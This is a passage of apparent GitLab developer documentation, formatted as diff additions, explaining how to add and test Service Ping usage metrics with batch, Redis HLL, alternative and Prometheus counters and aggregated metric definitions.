ActiveRecord_Relation in a given column +- **Sum Batch Counters:** Sum the values of a given ActiveRecord_Relation in a given column +- **Alternative Counters:** Used for settings and configurations +- **Redis Counters:** Used for in-memory counts. + +NOTE: +Only use the provided counter methods. Each counter method contains a built in fail safe to isolate each counter to avoid breaking the entire Service Ping. + +### Why batch counting + +For large tables, PostgreSQL can take a long time to count rows due to MVCC [(Multi-version Concurrency Control)](https://en.wikipedia.org/wiki/Multiversion_concurrency_control). Batch counting is a counting method where a single large query is broken into multiple smaller queries. For example, instead of a single query querying 1,000,000 records, with batch counting, you can execute 100 queries of 10,000 records each. Batch counting is useful for avoiding database timeouts as each batch query is significantly shorter than one single long running query. + +For GitLab.com, there are extremely large tables with 15 second query timeouts, so we use batch counting to avoid encountering timeouts. Here are the sizes of some GitLab.com tables: + +| Table | Row counts in millions | +|------------------------------|------------------------| +| `merge_request_diff_commits` | 2280 | +| `ci_build_trace_sections` | 1764 | +| `merge_request_diff_files` | 1082 | +| `events` | 514 | + +The following operation methods are available for your use: + +- [Ordinary Batch Counters](#ordinary-batch-counters) +- [Distinct Batch Counters](#distinct-batch-counters) +- [Sum Batch Operation](#sum-batch-operation) +- [Add Operation](#add-operation) +- [Estimated Batch Counters](#estimated-batch-counters) + +Batch counting requires indexes on columns to calculate max, min, and range queries. In some cases, +you may need to add a specialized index on the columns involved in a counter. + +### Ordinary Batch Counters + +Handles `ActiveRecord::StatementInvalid` error + +Simple count of a given `ActiveRecord_Relation`, does a non-distinct batch count, smartly reduces `batch_size`, and handles errors. + +Method: `count(relation, column = nil, batch: true, start: nil, finish: nil)` + +Arguments: + +- `relation` the ActiveRecord_Relation to perform the count +- `column` the column to perform the count on, by default is the primary key +- `batch`: default `true` to use batch counting +- `start`: custom start of the batch counting to avoid complex min calculations +- `end`: custom end of the batch counting to avoid complex min calculations + +Examples: + +```ruby +count(User.active) +count(::Clusters::Cluster.aws_installed.enabled, :cluster_id) +count(::Clusters::Cluster.aws_installed.enabled, :cluster_id, start: ::Clusters::Cluster.minimum(:id), finish: ::Clusters::Cluster.maximum(:id)) +``` + +### Distinct Batch Counters + +Handles `ActiveRecord::StatementInvalid` error + +Distinct count of a given `ActiveRecord_Relation` on given column, a distinct batch count, smartly reduces `batch_size`, and handles errors. + +Method: `distinct_count(relation, column = nil, batch: true, batch_size: nil, start: nil, finish: nil)` + +Arguments: + +- `relation` the ActiveRecord_Relation to perform the count +- `column` the column to perform the distinct count, by default is the primary key +- `batch`: default `true` to use batch counting +- `batch_size`: if none set it uses default value 10000 from `Gitlab::Database::BatchCounter` +- `start`: custom start of the batch counting to avoid complex min calculations +- `end`: custom end of the batch counting to avoid complex min calculations + +WARNING: +Counting over non-unique columns can lead to performance issues. Take a look at the [iterating tables in batches](../iterating_tables_in_batches.md) guide for more details. + +Examples: + +```ruby +distinct_count(::Project, :creator_id) +distinct_count(::Note.with_suggestions.where(time_period), :author_id, start: ::User.minimum(:id), finish: ::User.maximum(:id)) +distinct_count(::Clusters::Applications::CertManager.where(time_period).available.joins(:cluster), 'clusters.user_id') +``` + +### Sum Batch Operation + +Handles `ActiveRecord::StatementInvalid` error + +Sum the values of a given ActiveRecord_Relation on given column and handles errors. + +Method: `sum(relation, column, batch_size: nil, start: nil, finish: nil)` + +Arguments: + +- `relation` the ActiveRecord_Relation to perform the operation +- `column` the column to sum on +- `batch_size`: if none set it uses default value 1000 from `Gitlab::Database::BatchCounter` +- `start`: custom start of the batch counting to avoid complex min calculations +- `end`: custom end of the batch counting to avoid complex min calculations + +Examples: + +```ruby +sum(JiraImportState.finished, :imported_issues_count) +``` + +### Grouping & Batch Operations + +The `count`, `distinct_count`, and `sum` batch counters can accept an `ActiveRecord::Relation` +object, which groups by a specified column. With a grouped relation, the methods do batch counting, +handle errors, and returns a hash table of key-value pairs. + +Examples: + +```ruby +count(Namespace.group(:type)) +# returns => {nil=>179, "Group"=>54} + +distinct_count(Project.group(:visibility_level), :creator_id) +# returns => {0=>1, 10=>1, 20=>11} + +sum(Issue.group(:state_id), :weight)) +# returns => {1=>3542, 2=>6820} +``` + +### Add Operation + +Handles `StandardError`. + +Returns `-1` if any of the arguments are `-1`. + +Sum the values given as parameters. + +Method: `add(*args)` + +Examples + +```ruby +project_imports = distinct_count(::Project.where.not(import_type: nil), :creator_id) +bulk_imports = distinct_count(::BulkImport, :user_id) + + add(project_imports, bulk_imports) +``` + +### Estimated Batch Counters + +> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/48233) in GitLab 13.7. + +Estimated batch counter functionality handles `ActiveRecord::StatementInvalid` errors +when used through the provided `estimate_batch_distinct_count` method. +Errors return a value of `-1`. + +WARNING: +This functionality estimates a distinct count of a specific ActiveRecord_Relation in a given column, +which uses the [HyperLogLog](http://algo.inria.fr/flajolet/Publications/FlFuGaMe07.pdf) algorithm. +As the HyperLogLog algorithm is probabilistic, the **results always include error**. +The highest encountered error rate is 4.9%. + +When correctly used, the `estimate_batch_distinct_count` method enables efficient counting over +columns that contain non-unique values, which can not be assured by other counters. + +#### estimate_batch_distinct_count method + +Method: `estimate_batch_distinct_count(relation, column = nil, batch_size: nil, start: nil, finish: nil)` + +The [method](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/utils/usage_data.rb#L63) +includes the following arguments: + +- `relation`: The ActiveRecord_Relation to perform the count. +- `column`: The column to perform the distinct count. The default is the primary key. +- `batch_size`: From `Gitlab::Database::PostgresHll::BatchDistinctCounter::DEFAULT_BATCH_SIZE`. Default value: 10,000. +- `start`: The custom start of the batch count, to avoid complex minimum calculations. +- `finish`: The custom end of the batch count to avoid complex maximum calculations. + +The method includes the following prerequisites: + +1. The supplied `relation` must include the primary key defined as the numeric column. + For example: `id bigint NOT NULL`. +1. The `estimate_batch_distinct_count` can handle a joined relation. To use its ability to + count non-unique columns, the joined relation **must NOT** have a one-to-many relationship, + such as `has_many :boards`. +1. Both `start` and `finish` arguments should always represent primary key relationship values, + even if the estimated count refers to another column, for example: + + ```ruby + estimate_batch_distinct_count(::Note, :author_id, start: ::Note.minimum(:id), finish: ::Note.maximum(:id)) + ``` + +Examples: + +1. Simple execution of estimated batch counter, with only relation provided, + returned value represents estimated number of unique values in `id` column + (which is the primary key) of `Project` relation: + + ```ruby + estimate_batch_distinct_count(::Project) + ``` + +1. Execution of estimated batch counter, where provided relation has applied + additional filter (`.where(time_period)`), number of unique values estimated + in custom column (`:author_id`), and parameters: `start` and `finish` together + apply boundaries that defines range of provided relation to analyze: + + ```ruby + estimate_batch_distinct_count(::Note.with_suggestions.where(time_period), :author_id, start: ::Note.minimum(:id), finish: ::Note.maximum(:id)) + ``` + +1. Execution of estimated batch counter with joined relation (`joins(:cluster)`), + for a custom column (`'clusters.user_id'`): + + ```ruby + estimate_batch_distinct_count(::Clusters::Applications::CertManager.where(time_period).available.joins(:cluster), 'clusters.user_id') + ``` + +When instrumenting metric with usage of estimated batch counter please add +`_estimated` suffix to its name, for example: + +```ruby + "counts": { + "ci_builds_estimated": estimate_batch_distinct_count(Ci::Build), + ... +``` + +### Redis Counters + +Handles `::Redis::CommandError` and `Gitlab::UsageDataCounters::BaseCounter::UnknownEvent` +returns -1 when a block is sent or hash with all values -1 when a `counter(Gitlab::UsageDataCounters)` is sent +different behavior due to 2 different implementations of Redis counter + +Method: `redis_usage_data(counter, &block)` + +Arguments: + +- `counter`: a counter from `Gitlab::UsageDataCounters`, that has `fallback_totals` method implemented +- or a `block`: which is evaluated + +#### Ordinary Redis Counters + +Examples of implementation: + +- Using Redis methods [`INCR`](https://redis.io/commands/incr), [`GET`](https://redis.io/commands/get), and [`Gitlab::UsageDataCounters::WikiPageCounter`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/usage_data_counters/wiki_page_counter.rb) +- Using Redis methods [`HINCRBY`](https://redis.io/commands/hincrby), [`HGETALL`](https://redis.io/commands/hgetall), and [`Gitlab::UsageCounters::PodLogs`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/usage_counters/pod_logs.rb) + +##### UsageData API Tracking + +<!-- There's nearly identical content in `##### Adding new events`. If you fix errors here, you may need to fix the same errors in the other location. --> + +1. Track event using `UsageData` API + + Increment event count using ordinary Redis counter, for given event name. + + Tracking events using the `UsageData` API requires the `usage_data_api` feature flag to be enabled, which is enabled by default. + + API requests are protected by checking for a valid CSRF token. + + To be able to increment the values, the related feature `usage_data_<event_name>` should be enabled. + + ```plaintext + POST /usage_data/increment_counter + ``` + + | Attribute | Type | Required | Description | + | :-------- | :--- | :------- | :---------- | + | `event` | string | yes | The event name it should be tracked | + + Response + + - `200` if event was tracked + - `400 Bad request` if event parameter is missing + - `401 Unauthorized` if user is not authenticated + - `403 Forbidden` for invalid CSRF token provided + +1. Track events using JavaScript/Vue API helper which calls the API above + + Note that `usage_data_api` and `usage_data_#{event_name}` should be enabled to be able to track events + + ```javascript + import api from '~/api'; + + api.trackRedisCounterEvent('my_already_defined_event_name'), + ``` + +#### Redis HLL Counters + +WARNING: +HyperLogLog (HLL) is a probabilistic algorithm and its **results always includes some small error**. According to [Redis documentation](https://redis.io/commands/pfcount), data from +used HLL implementation is "approximated with a standard error of 0.81%". + +With `Gitlab::UsageDataCounters::HLLRedisCounter` we have available data structures used to count unique values. + +Implemented using Redis methods [PFADD](https://redis.io/commands/pfadd) and [PFCOUNT](https://redis.io/commands/pfcount). + +##### Adding new events + +1. Define events in [`known_events`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/usage_data_counters/known_events/). + + Example event: + + ```yaml + - name: users_creating_epics + category: epics_usage + redis_slot: users + aggregation: weekly + feature_flag: track_epics_activity + ``` + + Keys: + + - `name`: unique event name. + + Name format for Redis HLL events `<name>_<redis_slot>`. + + [See Metric name](metrics_dictionary.md#metric-name) for a complete guide on metric naming suggestion. + + Consider including in the event's name the Redis slot to be able to count totals for a specific category. + + Example names: `users_creating_epics`, `users_triggering_security_scans`. + + - `category`: event category. Used for getting total counts for events in a category, for easier + access to a group of events. + - `redis_slot`: optional Redis slot. Default value: event name. Only event data that is stored in the same slot + can be aggregated. Ensure keys are in the same slot. For example: + `users_creating_epics` with `redis_slot: 'users'` builds Redis key + `{users}_creating_epics-2020-34`. If `redis_slot` is not defined the Redis key will + be `{users_creating_epics}-2020-34`. + Recommended slots to use are: `users`, `projects`. This is the value we count. + - `expiry`: expiry time in days. Default: 29 days for daily aggregation and 6 weeks for weekly + aggregation. + - `aggregation`: may be set to a `:daily` or `:weekly` key. Defines how counting data is stored in Redis. + Aggregation on a `daily` basis does not pull more fine grained data. + - `feature_flag`: optional `default_enabled: :yaml`. If no feature flag is set then the tracking is enabled. One feature flag can be used for multiple events. For details, see our [GitLab internal Feature flags](../feature_flags/index.md) documentation. The feature flags are owned by the group adding the event tracking. + +1. Use one of the following methods to track the event: + + - In the controller using the `RedisTracking` module and the following format: + + ```ruby + track_redis_hll_event(*controller_actions, name:, if: nil, &block) + ``` + + Arguments: + + - `controller_actions`: the controller actions to track. + - `name`: the event name. + - `if`: optional custom conditions. Uses the same format as Rails callbacks. + - `&block`: optional block that computes and returns the `custom_id` that we want to track. This overrides the `visitor_id`. + + Example: + + ```ruby + # controller + class ProjectsController < Projects::ApplicationController + include RedisTracking + + skip_before_action :authenticate_user!, only: :show + track_redis_hll_event :index, :show, name: 'users_visiting_projects' + + def index + render html: 'index' + end + + def new + render html: 'new' + end + + def show + render html: 'show' + end + end + ``` + + - In the API using the `increment_unique_values(event_name, values)` helper method. + + Arguments: + + - `event_name`: the event name. + - `values`: the values counted. Can be one value or an array of values. + + Example: + + ```ruby + get ':id/registry/repositories' do + repositories = ContainerRepositoriesFinder.new( + user: current_user, subject: user_group + ).execute + + increment_unique_values('users_listing_repositories', current_user.id) + + present paginate(repositories), with: Entities::ContainerRegistry::Repository, tags: params[:tags], tags_count: params[:tags_count] + end + ``` + + - Using `track_usage_event(event_name, values)` in services and GraphQL. + + Increment unique values count using Redis HLL, for a given event name. + + Examples: + + - [Track usage event for an incident in a service](https://gitlab.com/gitlab-org/gitlab/-/blob/v13.8.3-ee/app/services/issues/update_service.rb#L66) + - [Track usage event for an incident in GraphQL](https://gitlab.com/gitlab-org/gitlab/-/blob/v13.8.3-ee/app/graphql/mutations/alert_management/update_alert_status.rb#L16) + + ```ruby + track_usage_event(:incident_management_incident_created, current_user.id) + ``` + + - Using the `UsageData` API. + <!-- There's nearly identical content in `##### UsageData API Tracking`. If you find / fix errors here, you may need to fix errors in that section too. --> + + Increment unique users count using Redis HLL, for a given event name. + + To track events using the `UsageData` API, ensure the `usage_data_api` feature flag + is set to `default_enabled: true`. Enabled by default in GitLab 13.7 and later. + + API requests are protected by checking for a valid CSRF token. + + ```plaintext + POST /usage_data/increment_unique_users + ``` + + | Attribute | Type | Required | Description | + | :-------- | :--- | :------- | :---------- | + | `event` | string | yes | The event name to track | + + Response: + + - `200` if the event was tracked, or if tracking failed for any reason. + - `400 Bad request` if an event parameter is missing. + - `401 Unauthorized` if the user is not authenticated. + - `403 Forbidden` if an invalid CSRF token is provided. + + - Using the JavaScript/Vue API helper, which calls the `UsageData` API. + + To track events using the `UsageData` API, ensure the `usage_data_api` feature flag + is set to `default_enabled: true`. Enabled by default in GitLab 13.7 and later. + + Example for an existing event already defined in [known events](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/usage_data_counters/known_events/): + + ```javascript + import api from '~/api'; + + api.trackRedisHllUserEvent('my_already_defined_event_name'), + ``` + +1. Get event data using `Gitlab::UsageDataCounters::HLLRedisCounter.unique_events(event_names:, start_date:, end_date:, context: '')`. + + Arguments: + + - `event_names`: the list of event names. + - `start_date`: start date of the period for which we want to get event data. + - `end_date`: end date of the period for which we want to get event data. + - `context`: context of the event. Allowed values are `default`, `free`, `bronze`, `silver`, `gold`, `starter`, `premium`, `ultimate`. + +1. Testing tracking and getting unique events + +Trigger events in rails console by using `track_event` method + + ```ruby + Gitlab::UsageDataCounters::HLLRedisCounter.track_event('users_viewing_compliance_audit_events', values: 1) + Gitlab::UsageDataCounters::HLLRedisCounter.track_event('users_viewing_compliance_audit_events', values: [2, 3]) + ``` + +Next, get the unique events for the current week. + + ```ruby + # Get unique events for metric for current_week + Gitlab::UsageDataCounters::HLLRedisCounter.unique_events(event_names: 'users_viewing_compliance_audit_events', + start_date: Date.current.beginning_of_week, end_date: Date.current.next_week) + ``` + +##### Recommendations + +We have the following recommendations for [Adding new events](#adding-new-events): + +- Event aggregation: weekly. +- Key expiry time: + - Daily: 29 days. + - Weekly: 42 days. +- When adding new metrics, use a [feature flag](../../operations/feature_flags.md) to control the impact. +- For feature flags triggered by another service, set `default_enabled: false`, + - Events can be triggered using the `UsageData` API, which helps when there are > 10 events per change + +##### Enable/Disable Redis HLL tracking + +Events are tracked behind optional [feature flags](../feature_flags/index.md) due to concerns for Redis performance and scalability. + +For a full list of events and corresponding feature flags see, [known_events](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/usage_data_counters/known_events/) files. + +To enable or disable tracking for specific event in <https://gitlab.com> or <https://about.staging.gitlab.com>, run commands such as the following to +[enable or disable the corresponding feature](../feature_flags/index.md). + +```shell +/chatops run feature set <feature_name> true +/chatops run feature set <feature_name> false +``` + +We can also disable tracking completely by using the global flag: + +```shell +/chatops run feature set redis_hll_tracking true +/chatops run feature set redis_hll_tracking false +``` + +##### Known events are added automatically in Service Data payload + +All events added in [`known_events/common.yml`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/usage_data_counters/known_events/common.yml) are automatically added to Service Data generation under the `redis_hll_counters` key. This column is stored in [version-app as a JSON](https://gitlab.com/gitlab-services/version-gitlab-com/-/blob/master/db/schema.rb#L209). +For each event we add metrics for the weekly and monthly time frames, and totals for each where applicable: + +- `#{event_name}_weekly`: Data for 7 days for daily [aggregation](#adding-new-events) events and data for the last complete week for weekly [aggregation](#adding-new-events) events. +- `#{event_name}_monthly`: Data for 28 days for daily [aggregation](#adding-new-events) events and data for the last 4 complete weeks for weekly [aggregation](#adding-new-events) events. + +Redis HLL implementation calculates automatic total metrics, if there are more than one metric for the same category, aggregation, and Redis slot. + +- `#{category}_total_unique_counts_weekly`: Total unique counts for events in the same category for the last 7 days or the last complete week, if events are in the same Redis slot and we have more than one metric. +- `#{category}_total_unique_counts_monthly`: Total unique counts for events in same category for the last 28 days or the last 4 complete weeks, if events are in the same Redis slot and we have more than one metric. + +Example of `redis_hll_counters` data: + +```ruby +{:redis_hll_counters=> + {"compliance"=> + {"users_viewing_compliance_dashboard_weekly"=>0, + "users_viewing_compliance_dashboard_monthly"=>0, + "users_viewing_compliance_audit_events_weekly"=>0, + "users_viewing_audit_events_monthly"=>0, + "compliance_total_unique_counts_weekly"=>0, + "compliance_total_unique_counts_monthly"=>0}, + "analytics"=> + {"users_viewing_analytics_group_devops_adoption_weekly"=>0, + "users_viewing_analytics_group_devops_adoption_monthly"=>0, + "analytics_total_unique_counts_weekly"=>0, + "analytics_total_unique_counts_monthly"=>0}, + "ide_edit"=> + {"users_editing_by_web_ide_weekly"=>0, + "users_editing_by_web_ide_monthly"=>0, + "users_editing_by_sfe_weekly"=>0, + "users_editing_by_sfe_monthly"=>0, + "ide_edit_total_unique_counts_weekly"=>0, + "ide_edit_total_unique_counts_monthly"=>0} + } +``` + +Example usage: + +```ruby +# Redis Counters +redis_usage_data(Gitlab::UsageDataCounters::WikiPageCounter) +redis_usage_data { ::Gitlab::UsageCounters::PodLogs.usage_totals[:total] } + +# Define events in common.yml https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/usage_data_counters/known_events/common.yml + +# Tracking events +Gitlab::UsageDataCounters::HLLRedisCounter.track_event('users_expanding_vulnerabilities', values: visitor_id) + +# Get unique events for metric +redis_usage_data { Gitlab::UsageDataCounters::HLLRedisCounter.unique_events(event_names: 'users_expanding_vulnerabilities', start_date: 28.days.ago, end_date: Date.current) } +``` + +### Alternative Counters + +Handles `StandardError` and fallbacks into -1 this way not all measures fail if we encounter one exception. +Mainly used for settings and configurations. + +Method: `alt_usage_data(value = nil, fallback: -1, &block)` + +Arguments: + +- `value`: a simple static value in which case the value is simply returned. +- or a `block`: which is evaluated +- `fallback: -1`: the common value used for any metrics that are failing. + +Usage: + +```ruby +alt_usage_data { Gitlab::VERSION } +alt_usage_data { Gitlab::CurrentSettings.uuid } +alt_usage_data(999) +``` + +### Adding counters to build new metrics + +When adding the results of two counters, use the `add` Service Data method that +handles fallback values and exceptions. It also generates a valid [SQL export](#exporting-service-ping-sql-queries-and-definitions). + +Example usage: + +```ruby +add(User.active, User.bot) +``` + +### Prometheus Queries + +In those cases where operational metrics should be part of Service Ping, a database or Redis query is unlikely +to provide useful data. Instead, Prometheus might be more appropriate, because most GitLab architectural +components publish metrics to it that can be queried back, aggregated, and included as Service Data. + +NOTE: +Prometheus as a data source for Service Ping is currently only available for single-node Omnibus installations +that are running the [bundled Prometheus](../../administration/monitoring/prometheus/index.md) instance. + +To query Prometheus for metrics, a helper method is available to `yield` a fully configured +`PrometheusClient`, given it is available as per the note above: + +```ruby +with_prometheus_client do |client| + response = client.query('<your query>') + ... +end +``` + +Please refer to [the `PrometheusClient` definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/prometheus_client.rb) +for how to use its API to query for data. + +### Fallback values for UsagePing + +We return fallback values in these cases: + +| Case | Value | +|-----------------------------|-------| +| Deprecated Metric | -1000 | +| Timeouts, general failures | -1 | +| Standard errors in counters | -2 | + +## Developing and testing Service Ping + +### 1. Naming and placing the metrics + +Add the metric in one of the top level keys + +- `settings`: for settings related metrics. +- `counts_weekly`: for counters that have data for the most recent 7 days. +- `counts_monthly`: for counters that have data for the most recent 28 days. +- `counts`: for counters that have data for all time. + +### 2. Use your Rails console to manually test counters + +```ruby +# count +Gitlab::UsageData.count(User.active) +Gitlab::UsageData.count(::Clusters::Cluster.aws_installed.enabled, :cluster_id) + +# count distinct +Gitlab::UsageData.distinct_count(::Project, :creator_id) +Gitlab::UsageData.distinct_count(::Note.with_suggestions.where(time_period), :author_id, start: ::User.minimum(:id), finish: ::User.maximum(:id)) +``` + +### 3. Generate the SQL query + +Your Rails console returns the generated SQL queries. + +Example: + +```ruby +pry(main)> Gitlab::UsageData.count(User.active) + (2.6ms) SELECT "features"."key" FROM "features" + (15.3ms) SELECT MIN("users"."id") FROM "users" WHERE ("users"."state" IN ('active')) AND ("users"."user_type" IS NULL OR "users"."user_type" IN (6, 4)) + (2.4ms) SELECT MAX("users"."id") FROM "users" WHERE ("users"."state" IN ('active')) AND ("users"."user_type" IS NULL OR "users"."user_type" IN (6, 4)) + (1.9ms) SELECT COUNT("users"."id") FROM "users" WHERE ("users"."state" IN ('active')) AND ("users"."user_type" IS NULL OR "users"."user_type" IN (6, 4)) AND "users"."id" BETWEEN 1 AND 100000 +``` + +### 4. Optimize queries with #database-lab + +Paste the SQL query into `#database-lab` to see how the query performs at scale. + +- `#database-lab` is a Slack channel which uses a production-sized environment to test your queries. +- GitLab.com's production database has a 15 second timeout. +- Any single query must stay below [1 second execution time](../query_performance.md#timing-guidelines-for-queries) with cold caches. +- Add a specialized index on columns involved to reduce the execution time. + +To have an understanding of the query's execution we add in the MR description the following information: + +- For counters that have a `time_period` test we add information for both cases: + - `time_period = {}` for all time periods + - `time_period = { created_at: 28.days.ago..Time.current }` for last 28 days period +- Execution plan and query time before and after optimization +- Query generated for the index and time +- Migration output for up and down execution + +We also use `#database-lab` and [explain.depesz.com](https://explain.depesz.com/). For more details, see the [database review guide](../database_review.md#preparation-when-adding-or-modifying-queries). + +#### Optimization recommendations and examples + +- Use specialized indexes [example 1](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/26871), [example 2](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/26445). +- Use defined `start` and `finish`, and simple queries. These values can be memoized and reused, [example](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/37155). +- Avoid joins and write the queries as simply as possible, [example](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/36316). +- Set a custom `batch_size` for `distinct_count`, [example](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/38000). + +### 5. Add the metric definition + +[Check Metrics Dictionary Guide](metrics_dictionary.md) + +When adding, updating, or removing metrics, please update the [Metrics Dictionary](dictionary.md). + +### 6. Add new metric to Versions Application + +Check if new metrics need to be added to the Versions Application. See `usage_data` [schema](https://gitlab.com/gitlab-services/version-gitlab-com/-/blob/master/db/schema.rb#L147) and Service Data [parameters accepted](https://gitlab.com/gitlab-services/version-gitlab-com/-/blob/master/app/services/usage_ping.rb). Any metrics added under the `counts` key are saved in the `stats` column. + +### 7. Add the feature label + +Add the `feature` label to the Merge Request for new Service Ping metrics. These are user-facing changes and are part of expanding the Service Ping feature. + +### 8. Add a changelog + +Ensure you comply with the [Changelog entries guide](../changelog.md). + +### 9. Ask for a Product Intelligence Review + +On GitLab.com, we have DangerBot set up to monitor Product Intelligence related files and DangerBot recommends a [Product Intelligence review](review_guidelines.md). + +### 10. Verify your metric + +On GitLab.com, the Product Intelligence team regularly [monitors Service Ping](https://gitlab.com/groups/gitlab-org/-/epics/6000). +They may alert you that your metrics need further optimization to run quicker and with greater success. + +The Service Ping JSON payload for GitLab.com is shared in the +[#g_product_intelligence](https://gitlab.slack.com/archives/CL3A7GFPF) Slack channel every week. + +You may also use the [Service Ping QA dashboard](https://app.periscopedata.com/app/gitlab/632033/Usage-Ping-QA) to check how well your metric performs. The dashboard allows filtering by GitLab version, by "Self-managed" & "SaaS" and shows you how many failures have occurred for each metric. Whenever you notice a high failure rate, you may re-optimize your metric. + +### Service Ping local setup + +To set up Service Ping locally, you must: + +1. [Set up local repositories](#set-up-local-repositories). +1. [Test local setup](#test-local-setup). +1. (Optional) [Test Prometheus-based Service Ping](#test-prometheus-based-service-ping). + +#### Set up local repositories + +1. Clone and start [GitLab](https://gitlab.com/gitlab-org/gitlab-development-kit). +1. Clone and start [Versions Application](https://gitlab.com/gitlab-services/version-gitlab-com). + Make sure to run `docker-compose up` to start a PostgreSQL and Redis instance. +1. Point GitLab to the Versions Application endpoint instead of the default endpoint: + 1. Open [submit_usage_ping_service.rb](https://gitlab.com/gitlab-org/gitlab/-/blob/master/app/services/submit_usage_ping_service.rb#L4) in your local and modified `PRODUCTION_URL`. + 1. Set it to the local Versions Application URL `http://localhost:3000/usage_data`. + +#### Test local setup + +1. Using the `gitlab` Rails console, manually trigger Service Ping: + + ```ruby + ServicePing::SubmitService.new.execute + ``` + +1. Use the `versions` Rails console to check the Service Ping was successfully received, + parsed, and stored in the Versions database: + + ```ruby + UsageData.last + ``` + +### Test Prometheus-based Service Ping + +If the data submitted includes metrics [queried from Prometheus](#prometheus-queries) +you want to inspect and verify, you must: + +- Ensure that a Prometheus server is running locally. +- Ensure the respective GitLab components are exporting metrics to the Prometheus server. + +If you do not need to test data coming from Prometheus, no further action +is necessary. Service Ping should degrade gracefully in the absence of a running Prometheus server. + +Three kinds of components may export data to Prometheus, and are included in Service Ping: + +- [`node_exporter`](https://github.com/prometheus/node_exporter): Exports node metrics + from the host machine. +- [`gitlab-exporter`](https://gitlab.com/gitlab-org/gitlab-exporter): Exports process metrics + from various GitLab components. +- Other various GitLab services, such as Sidekiq and the Rails server, which export their own metrics. + +#### Test with an Omnibus container + +This is the recommended approach to test Prometheus based Service Ping. + +The easiest way to verify your changes is to build a new Omnibus image from your code branch by using CI, then download the image +and run a local container instance: + +1. From your merge request, click on the `qa` stage, then trigger the `package-and-qa` job. This job triggers an Omnibus +build in a [downstream pipeline of the `omnibus-gitlab-mirror` project](https://gitlab.com/gitlab-org/build/omnibus-gitlab-mirror/-/pipelines). +1. In the downstream pipeline, wait for the `gitlab-docker` job to finish. +1. Open the job logs and locate the full container name including the version. It takes the following form: `registry.gitlab.com/gitlab-org/build/omnibus-gitlab-mirror/gitlab-ee:<VERSION>`. +1. On your local machine, make sure you are signed in to the GitLab Docker registry. You can find the instructions for this in +[Authenticate to the GitLab Container Registry](../../user/packages/container_registry/index.md#authenticate-with-the-container-registry). +1. Once signed in, download the new image by using `docker pull registry.gitlab.com/gitlab-org/build/omnibus-gitlab-mirror/gitlab-ee:<VERSION>` +1. For more information about working with and running Omnibus GitLab containers in Docker, please refer to [GitLab Docker images](https://docs.gitlab.com/omnibus/docker/README.html) in the Omnibus documentation. + +#### Test with GitLab development toolkits + +This is the less recommended approach, because it comes with a number of difficulties when emulating a real GitLab deployment. + +The [GDK](https://gitlab.com/gitlab-org/gitlab-development-kit) is not set up to run a Prometheus server or `node_exporter` alongside other GitLab components. If you would +like to do so, [Monitoring the GDK with Prometheus](https://gitlab.com/gitlab-org/gitlab-development-kit/-/blob/main/doc/howto/prometheus/index.md#monitoring-the-gdk-with-prometheus) is a good start. + +The [GCK](https://gitlab.com/gitlab-org/gitlab-compose-kit) has limited support for testing Prometheus based Service Ping. +By default, it already comes with a fully configured Prometheus service that is set up to scrape a number of components, +but with the following limitations: + +- It does not run a `gitlab-exporter` instance, so several `process_*` metrics from services such as Gitaly may be missing. +- While it runs a `node_exporter`, `docker-compose` services emulate hosts, meaning that it would normally report itself to not be associated +with any of the other services that are running. That is not how node metrics are reported in a production setup, where `node_exporter` +always runs as a process alongside other GitLab components on any given node. From Service Ping's perspective none of the node data would therefore +appear to be associated to any of the services running, because they all appear to be running on different hosts. To alleviate this problem, the `node_exporter` in GCK was arbitrarily "assigned" to the `web` service, meaning only for this service `node_*` metrics appears in Service Ping. + +## Aggregated metrics + +> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/45979) in GitLab 13.6. + +WARNING: +This feature is intended solely for internal GitLab use. + +To add data for aggregated metrics into Service Ping payload you should add corresponding definition at [`config/metrics/aggregates/*.yaml`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/aggregates/) for metrics available at Community Edition and at [`ee/config/metrics/aggregates/*.yaml`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/aggregates/) for Enterprise Edition ones. + +Each aggregate definition includes following parts: + +- `name`: Unique name under which the aggregate metric is added to the Service Ping payload. +- `operator`: Operator that defines how the aggregated metric data is counted. Available operators are: + - `OR`: Removes duplicates and counts all entries that triggered any of listed events. + - `AND`: Removes duplicates and counts all elements that were observed triggering all of following events. +- `time_frame`: One or more valid time frames. Use these to limit the data included in aggregated metric to events within a specific date-range. Valid time frames are: + - `7d`: Last seven days of data. + - `28d`: Last twenty eight days of data. + - `all`: All historical data, only available for `database` sourced aggregated metrics. +- `source`: Data source used to collect all events data included in aggregated metric. Valid data sources are: + - [`database`](#database-sourced-aggregated-metrics) + - [`redis`](#redis-sourced-aggregated-metrics) +- `events`: list of events names to aggregate into metric. All events in this list must + relay on the same data source. Additional data source requirements are described in the + [Database sourced aggregated metrics](#database-sourced-aggregated-metrics) and + [Redis sourced aggregated metrics](#redis-sourced-aggregated-metrics) sections. +- `feature_flag`: Name of [development feature flag](../feature_flags/index.md#development-type) + that is checked before metrics aggregation is performed. Corresponding feature flag + should have `default_enabled` attribute set to `false`. The `feature_flag` attribute + is optional and can be omitted. When `feature_flag` is missing, no feature flag is checked. + +Example aggregated metric entries: + +```yaml +- name: example_metrics_union + operator: OR + events: + - 'users_expanding_secure_security_report' + - 'users_expanding_testing_code_quality_report' + - 'users_expanding_testing_accessibility_report' + source: redis + time_frame: + - 7d + - 28d +- name: example_metrics_intersection + operator: AND + source: database + time_frame: + - 28d + - all + events: + - 'dependency_scanning_pipeline_all_time' + - 'container_scanning_pipeline_all_time' + feature_flag: example_aggregated_metric +``` + +Aggregated metrics collected in `7d` and `28d` time frames are added into Service 